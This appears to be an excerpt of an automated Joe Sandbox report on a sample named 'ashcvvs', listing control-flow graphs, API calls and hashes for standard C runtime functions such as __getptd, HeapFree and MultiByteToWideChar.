                            control_flow_graph 182 405ee0-405efb call 403354 call 404eba 187 405f1a-405f32 call 40285b 182->187 188 405efd-405f01 182->188 195 405f34-405f36 187->195 196 405f6a-405f76 call 405f7b 187->196 188->187 190 405f03 188->190 191 405f06-405f08 190->191 193 405f12-405f19 call 403399 191->193 194 405f0a-405f11 call 40368a 191->194 194->193 200 405f52-405f64 InterlockedIncrement 195->200 201 405f38-405f41 InterlockedDecrement 195->201 196->191 200->196 201->200 205 405f43-405f49 201->205 205->200 206 405f4b-405f51 call 4010ad 205->206 206->200
                            APIs
                            • __getptd.LIBCMT ref: 00405EEC
                              • Part of subcall function 00404EBA: __getptd_noexit.LIBCMT ref: 00404EBD
                              • Part of subcall function 00404EBA: __amsg_exit.LIBCMT ref: 00404ECA
                            • __amsg_exit.LIBCMT ref: 00405F0C
                            • __lock.LIBCMT ref: 00405F1C
                            • InterlockedDecrement.KERNEL32(?), ref: 00405F39
                            • InterlockedIncrement.KERNEL32(021B17F0), ref: 00405F64
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 4f7909c239fe3fb2b9763dd1652ba7c177487cd15552de12b0bd16a717823477
                            • Instruction ID: 1a3862eaffe938a5a04654e4f95986a4a86c562000797629d9b52b1ba9018c53
                            • Opcode Fuzzy Hash: 4f7909c239fe3fb2b9763dd1652ba7c177487cd15552de12b0bd16a717823477
                            • Instruction Fuzzy Hash: A7012A31A01A22DBCA21AB66980675F7760FF04715F54413BE904B76D1CB3C5952CEDE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 209 4010ad-4010be call 403354 212 4010c0-4010c7 209->212 213 401135-40113a call 403399 209->213 215 4010c9-4010e1 call 40285b call 40288e 212->215 216 40110c 212->216 226 4010e3-4010eb call 4028be 215->226 227 4010ec-4010fc call 401103 215->227 218 40110d-40111d HeapFree 216->218 218->213 220 40111f-401134 call 402666 GetLastError call 402624 218->220 220->213 226->227 227->213 234 4010fe-401101 227->234 234->218
                            APIs
                            • __lock.LIBCMT ref: 004010CB
                              • Part of subcall function 0040285B: __mtinitlocknum.LIBCMT ref: 00402871
                              • Part of subcall function 0040285B: __amsg_exit.LIBCMT ref: 0040287D
                              • Part of subcall function 0040285B: EnterCriticalSection.KERNEL32(0040265C,0040265C,?,004035BD,00000004,00428728,0000000C,0040673E,0040102A,0040266B,00000000,00000000,00000000,?,00404E6C,00000001), ref: 00402885
                            • ___sbh_find_block.LIBCMT ref: 004010D6
                            • ___sbh_free_block.LIBCMT ref: 004010E5
                            • HeapFree.KERNEL32(00000000,0040102A,00428680,0000000C,0040283C,00000000,00428708,0000000C,00402876,0040102A,0040265C,?,004035BD,00000004,00428728,0000000C), ref: 00401115
                            • GetLastError.KERNEL32(?,004035BD,00000004,00428728,0000000C,0040673E,0040102A,0040266B,00000000,00000000,00000000,?,00404E6C,00000001,00000214), ref: 00401126
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 2714421763-0
                            • Opcode ID: ba79612b5d8776600ab4de6d9d473ae021ce5076515930a07278760b3adc5ee0
                            • Instruction ID: 8961604c9efdb82a7c022f95c56f03fbdb1ca628a5d7b3b1d8682caae66e3d49
                            • Opcode Fuzzy Hash: ba79612b5d8776600ab4de6d9d473ae021ce5076515930a07278760b3adc5ee0
                            • Instruction Fuzzy Hash: 91018431901211DADB357FB2A90AB4E3A649F04B15F10413FF6547A1E1CA7C85418A9D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 235 4246c7-4246d4 GetModuleHandleA 236 4246d6-4246e4 GetProcAddress 235->236 237 4246eb 235->237 236->237 238 4246e6-4246ea 236->238 240 4246c3-4246c6 237->240 241 4246be-4246c2 237->241
                            APIs
                            • GetModuleHandleA.KERNEL32(KERNEL32,00423B6F), ref: 004246CC
                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004246DC
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsProcessorFeaturePresent$KERNEL32
                            • API String ID: 1646373207-3105848591
                            • Opcode ID: 650bc48674ae330932e524258421bb0110a511ee22e69581295ed82ba26d40f9
                            • Instruction ID: a45b55ef62fe2cddc5a1fc2af0cd6119b8d81e54aebd11f2c10a25c51e0f7d02
                            • Opcode Fuzzy Hash: 650bc48674ae330932e524258421bb0110a511ee22e69581295ed82ba26d40f9
                            • Instruction Fuzzy Hash: 76F03030B01A1AE2DB106BA1BD0E76F7BB8FFC1741FD20595D591A0094DF7880B5C64E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 243 40829e-4082af 244 4082b1-4082b4 243->244 245 4082c6 243->245 244->245 246 4082b6-4082b8 244->246 247 4082c8-4082cb 245->247 248 4082ba-4082bf 246->248 249 4082cc-4082dd call 401802 246->249 248->245 250 4082c1-4082c3 248->250 253 4082fe-40830f call 4069e4 249->253 254 4082df-4082e4 249->254 250->245 261 408311-40831d 253->261 262 40838e-4083ad MultiByteToWideChar 253->262 255 4082e6-4082ea 254->255 256 4082ed-4082f0 254->256 255->256 258 4082f2-4082f5 256->258 259 4082f9-4082fc 256->259 258->259 259->247 264 408344-40834d 261->264 265 40831f-408322 261->265 262->256 263 4083b3 262->263 266 40836f-40837d call 402666 263->266 264->266 268 40834f-408352 264->268 265->264 267 408324-408342 MultiByteToWideChar 265->267 273 408386-408389 266->273 274 40837f-408382 266->274 267->264 269 408354-40835d 267->269 268->266 268->269 269->247 272 408363-40836a 269->272 272->247 273->247 274->273
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004082D2
                            • __isleadbyte_l.LIBCMT ref: 00408306
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00408337
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 004083A5
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 57784c86470ed8ff91c809e530559af945dd142c3226e4a84c623129bcb00e67
                            • Instruction ID: 2131b2d15cd432383d47f6c14abb9ff0fc8b04249a1240ce69537125248ea617
                            • Opcode Fuzzy Hash: 57784c86470ed8ff91c809e530559af945dd142c3226e4a84c623129bcb00e67
                            • Instruction Fuzzy Hash: 1A31D331A10245EFCB20DFA8C9849BE3BA5BF01310F1585BEE491AB2D1DB35DD50DB58

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 275 4245b3-4245be 276 4245c0-4245c3 275->276 277 42461f-424631 call 423ea4 275->277 276->277 279 4245c5-4245c8 276->279 280 424636-42463a 277->280 281 4245e3-4245e6 279->281 282 4245ca-4245e2 call 4243fe 279->282 283 424606-42461d call 423f94 281->283 284 4245e8-4245eb 281->284 283->280 284->283 286 4245ed-424604 call 4244b9 284->286 286->280
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: 79eb0d46623e3e840f5a8a74d676871430ce86260699b964cc8067b3add82cac
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: 8A117232600159BBCF225E84EC01CEE3F62FB59754B998416FA1955130C63ACAB2AB89

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 292 40664c-406667 call 403354 call 404eba 297 406669-40666d 292->297 298 40668b-4066b4 call 40285b call 40660e call 4066b6 292->298 297->298 299 40666f-406674 call 404eba 297->299 305 406677-406679 298->305 299->305 308 406683-40668a call 403399 305->308 309 40667b-406682 call 40368a 305->309 309->308
                            APIs
                            • __getptd.LIBCMT ref: 00406658
                              • Part of subcall function 00404EBA: __getptd_noexit.LIBCMT ref: 00404EBD
                              • Part of subcall function 00404EBA: __amsg_exit.LIBCMT ref: 00404ECA
                            • __getptd.LIBCMT ref: 0040666F
                            • __amsg_exit.LIBCMT ref: 0040667D
                            • __lock.LIBCMT ref: 0040668D
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: 89bb69dbc30f51cdb6260ca9e6788ceaff053369bdb7183063236ed47fa0266e
                            • Instruction ID: 76af6fb7642dac4c6fc83e8a51a4ea9dfe5e15d74b56128012a1f83f10435fa7
                            • Opcode Fuzzy Hash: 89bb69dbc30f51cdb6260ca9e6788ceaff053369bdb7183063236ed47fa0266e
                            • Instruction Fuzzy Hash: 52F06231900210CFD620BBB6C40674E77A0AB00719F524A3FE845B73D1CB3D99118A9E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 315 423485-4234c2 316 4234c4-4234ca 315->316 317 4234d0-423594 GetModuleHandleW GetProcAddress 316->317 318 423599-4235a0 316->318 317->318 318->316 319 4235a6-4235a8 318->319
                            APIs
                            • GetModuleHandleW.KERNEL32(0043A3B0,00000000,?,?,00423A96,?,?,00000001,?,00423AF5,00401523,00400000,?,00000000,0000000A), ref: 00423551
                            • GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042358E
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.4090178076.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.4090150603.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090178076.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090235010.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090254348.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000009.00000002.4090274859.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID:
                            • API String ID: 1646373207-3916222277
                            • Opcode ID: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction ID: d0582955cadd0fc5f4b94350803a6a31df697eece703d4cb31990996f5db6057
                            • Opcode Fuzzy Hash: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction Fuzzy Hash: 8E31531569C3C0D8E331CBA8BC857297B62AB15B14F54347AD9848B2F1D3FA056A836F